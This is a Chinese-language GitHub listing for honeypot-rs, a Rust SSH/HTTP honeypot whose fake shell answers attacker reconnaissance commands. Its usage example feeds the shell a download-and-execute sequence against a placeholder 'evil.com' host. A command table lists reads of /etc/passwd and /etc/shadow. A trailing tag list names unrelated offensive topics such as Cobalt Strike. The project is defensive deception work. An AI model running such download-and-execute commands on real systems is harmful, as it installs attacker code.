InnerWarden/honeypot-rs
GitHub: InnerWarden/honeypot-rs
用 Rust 编写的轻量 SSH/HTTP 蜜罐,内置确定性伪装 Shell,可在无 AI 依赖的情况下即时模拟真实系统响应,帮助安全团队以极低代价捕获攻击行为。
Stars: 0 | Forks: 0
# honeypot-rs
**轻量级 SSH/HTTP 蜜罐,采用 Rust 编写并带有伪装 Shell。** 捕获攻击者行为,对真实系统零风险。
## 伪装 Shell
honeypot-rs 的核心是一个确定性的伪装 Shell,可即时响应 40 多种常见的侦察命令——无需 AI,无需 LLM,无延迟。
```
use honeypot_rs::fake_shell::FakeShell;
let shell = FakeShell::new("prod-web-03", "root");
assert_eq!(shell.execute("whoami"), Some("root".into()));
assert_eq!(shell.execute("hostname"), Some("prod-web-03".into()));
// Attackers see realistic output
let ps = shell.execute("ps aux").unwrap();
assert!(ps.contains("sshd"));
assert!(ps.contains("nginx"));
// Dangerous commands silently "succeed" (nothing happens)
shell.execute("wget http://evil.com/malware -O /tmp/x");
shell.execute("chmod +x /tmp/x && /tmp/x");
// Unknown commands get realistic error
let resp = shell.execute("nmap 10.0.0.0/24").unwrap();
assert!(resp.contains("command not found"));
```
## 支持的命令
| 类别 | 命令 |
|----------|----------|
| 身份 | `whoami`, `id`, `hostname`, `uname -a`, `uptime`, `w` |
| 系统 | `cat /etc/os-release`, `cat /etc/passwd`, `free -h`, `df -h` |
| 网络 | `ifconfig`, `ip addr`, `netstat -tlnp`, `ss -tlnp` |
| 进程 | `ps aux`, `ps -ef` |
| 文件系统 | `ls`, `ls -la`, `pwd`, `cat /etc/shadow` (拒绝访问) |
| 安全 | `iptables -L`, `crontab -l`, `env`, `which curl/wget/python` |
| 透传 | `echo *`, `cd *`, `exit` |
| 危险 | `rm`, `wget`, `curl`, `chmod`, `chown` (静默空操作) |
## 安装
```
[dependencies]
honeypot-rs = { git = "https://github.com/InnerWarden/honeypot-rs" }
```
[InnerWarden](https://innerwarden.com) 安全生态系统的一部分。
标签:ADCS攻击, BOF, Cobalt Strike, Fake Shell, HTTP蜜罐, InnerWarden, IP 地址批量处理, LangChain, Rust, SSH蜜罐, 内存分配, 可视化界面, 命令模拟, 威胁情报, 开发库, 开发者工具, 开源, 攻击诱捕, 模拟终端, 欺骗防御, 网络安全, 网络流量审计, 蜜罐, 行为捕获, 证书利用, 轻量级, 进程注入, 隐私保护